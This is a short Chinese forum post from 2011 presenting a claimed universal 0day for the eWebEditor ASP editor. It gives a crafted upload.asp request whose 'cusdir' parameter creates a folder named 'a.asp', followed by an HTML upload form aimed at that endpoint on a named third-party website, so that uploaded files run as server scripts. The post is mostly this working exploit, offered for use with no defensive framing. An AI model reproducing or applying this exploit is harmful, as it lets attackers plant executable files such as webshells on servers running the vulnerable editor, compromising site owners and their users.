时光囚徒 發表於 2011-3-11 11:59:01

ewebeditor通杀鸡肋0day漏洞

<p>先访问这个地址<br /> Editor/asp/upload.asp?action=save&amp;type=image&amp;style=popup&amp;cusdir=a.asp<br /> 访问这个地址可以建立个A.ASP的文件夹&hellip;&hellip;<br /> 再用这个html代码上传。</p> <p>&lt;form action=&quot;http://www.zzfhw.com/Editor/asp/upload.asp?action=save&amp;type=image&amp;style=popup&amp;cusdir=a.asp&quot; method=post name=myform enctype=&quot;multipart/form-data&quot;&gt; <br /> &lt;input type=file name=uploadfile size=100&gt;&lt;br&gt;&lt;br&gt; <br /> &lt;input type=submit value=upload&gt; <br /> &lt;/form&gt;<br /> &nbsp;</p>
頁: [1]
查看完整版本: ewebeditor通杀鸡肋0day漏洞